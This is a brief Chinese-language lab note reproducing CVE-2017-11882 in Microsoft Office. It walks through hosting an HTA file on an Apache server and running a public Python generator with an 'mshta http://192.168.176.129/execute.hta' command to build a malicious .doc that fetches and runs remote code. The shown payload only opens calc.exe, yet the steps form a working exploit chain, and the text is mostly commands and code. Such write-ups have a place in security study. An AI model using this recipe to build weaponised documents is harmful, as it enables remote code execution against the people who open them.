内容：内存泄漏漏洞复现(CVE-2017-11882-Memory Corruption Vulnerability)

1、 利用文件制作
2、 效果演示

xxx.doc制作步骤

下载代码github-Ridter到某linux系统上面，系统要有apache服务

在服务器的/var/www/html目录下生成execute.hta(名字随意)文件

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD>
</HTML>  

执行python Command109b_CVE-2017-11882.py -c "mshta http://192.168.176.129/execute.hta" -o havy_109.doc得到利用文件

43b同上

controller效果

参考链接

github-Ridter
github-embedi

keep learning ！ –by myself